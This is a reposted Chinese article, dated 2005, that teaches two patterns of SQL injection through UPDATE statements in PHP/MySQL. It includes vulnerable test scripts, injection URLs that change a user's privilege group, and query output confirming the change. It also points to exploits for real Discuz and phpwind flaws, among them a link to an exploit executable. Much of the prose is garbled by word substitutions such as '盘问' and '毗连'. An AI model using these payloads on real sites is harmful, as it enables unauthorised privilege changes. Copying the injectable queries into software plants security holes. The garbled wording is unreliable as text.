设为主页 | 加入收藏 | 繁體中文

UPDATE注射(mysql+php)的两个模式

  UPDATE注射(mysql+php)的两个模式
  文/宁静天使·SuperHei 2005.8.11
  一.测试情况:
  OS: Windowsxp sp2
  php: php 4.3.10 (
  mysql 4.1.9
  apache 1.3.33 
  二.测试数据库结构:
  -----start---
  -- 数据库: `test`
  -- 
  -- --------------------------------------------------------
  -- 
  -- 表的结构 `userinfo`
  -- 
  CREATE TABLE `userinfo` (
  `groudid` varchar(12) NOT NULL default ’1’,
  `user` varchar(12) NOT NULL default ’heige’,
  `pass` varchar(122) NOT NULL default ’123456’
  ) ENGINE=MyISAM DEFAULT CHARSET=latin1;
  -- 
  -- 导出表中的数据 `userinfo`
  -- 
  INSERT INTO `userinfo` VALUES (’2’, ’heige’, ’123456’);
  ------end-------
  三.测试模式:
  1,变量没有带’’或""[MOD1]
    //test1.php Mod1
  $servername = "localhost";
  $dbusername = "root";
  $dbpassword = "";
  $dbname = "test";
  mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库毗连失败");
  $sql = "update userinfo set pass=$p where user=’heige’";//<--$P没有利用单引号
  $result = mysql_db_query($dbname, $sql);
  $userinfo = mysql_fetch_array($result);
  echo "

SQL Query:$sql

";
  ?>
  脚本里只是修改user=’heige’的pass,如果groudid表示用户的权限品级,我们的目标便是经过构造$p 来达
  到修改groupid的目标:
  那么我们提交:http://127.0.0.1/test1.php?p=123456,groudid=1
  在mysql里盘问:
  mysql> select * from userinfo;
  +---------+-------+--------+
  | groudid | user  | pass   |
  +---------+-------+--------+
  | 1       | heige | 123456 |
  +---------+-------+--------+
  1 row in set (0.01 sec)
  用户heige的groudid又2改为1了 :)
  以是我们可以得到没有’’或"" update的注射是可以成功的,这个便是我们的模式1。
  2,变量带’’或""[MOD2]
    //test2.php
  $servername = "localhost";
  $dbusername = "root";
  $dbpassword = "";
  $dbname = "test";
  mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库毗连失败");
  $sql = "update userinfo set pass=’$p’ where user=’heige’";//<--$P利用单引号
  $result = mysql_db_query($dbname, $sql);
  $userinfo = mysql_fetch_array($result);
  echo "

SQL Query:$sql

";
  ?>
  为了封闭’我们构造$p应该为123456’,groudid=’2 提交:
  http://127.0.0.1/test2.php?p=123456’,groudid=’1 在gpc=on的情况下’变成了\’
  提交的语句变成:SQL Query:update userinfo set pass=’123456\’,groudid=\’1’ where user=’heige’
  mysql盘问:
  mysql> select * from userinfo;
  +---------+-------+--------------------+
  | groudid | user  | pass               |
  +---------+-------+--------------------+
  | 2       | heige | 123456’,groudid=’1 |
  +---------+-------+--------------------+
  1 row in set (0.00 sec)
  groudid并没有被修改。那么在变量被’’或""时 就完全没有被注射呢?不是 下面我们看模式2:
    //test3.php Mod2
  $servername = "localhost";
  $dbusername = "root";
  $dbpassword = "";
  $dbname = "test";
  mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库毗连失败");
  $sql = "update userinfo set pass=’$p’ where user=’heige’";//<--$P利用单引号
  $result = mysql_db_query($dbname, $sql);
  mysql_fetch_array($result);    //$p的数据写入数据库
  $sql= "select pass from userinfo where user=’heige’"; 
  $result = mysql_db_query($dbname, $sql);
  $userinfo=mysql_fetch_array($result); 
  echo $userinfo[0];  //把pass盘问输入给$userinfo[0]
  $sql ="update userinfo set pass=’$userinfo[0]’ where user=’heige’";
  $result = mysql_db_query($dbname, $sql);
  mysql_fetch_array($result); //把$userinfo[0] 再次update
  ?>
  我们测试下,提交:http://127.0.0.1/test3.php?p=123456’,groudid=’1
  回mysql盘问下 :
  mysql> select * from userinfo;
  +---------+-------+--------+
  | groudid | user  | pass   |
  +---------+-------+--------+
  | 1       | heige | 123456 |
  +---------+-------+--------+
  1 row in set (0.00 sec)
  HaHa~~ 成功注射 修改groudid为1。 这个便是我们的模式2了,简略的描叙如下:
  update-->select-->update
  四.现实模式
  模式1:Discuz 2.0/2.2 register.php 注射 
  漏洞分析:http://4ngel.net/article/41.htm
  Discuz 2.0/2.2 register.php Remote Exploit :http://4ngel.net/project/discuz_reg.htm
  模式2:phpwind 2.0.2和3.31e 权限提拔漏洞 
  漏洞分析:
  update (profile.php 注射变量为$proicon update语句里为,icon=’$userdb[icon]’)
  |
  v
  select (jop.php)
  |
  v
  updtate (jop.php)
  Exploit:http://www.huij.net/9xiao/up/phpwind-exploit.exe 
  五.鸣谢
  分外感谢saiy等朋侪的讨论和帮助。Thanks!!!
 


    文章作者: 福州军威计算机技术有限公司
    军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
    版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。

TAG:
评论加载中...
内容:
评论者: 验证码: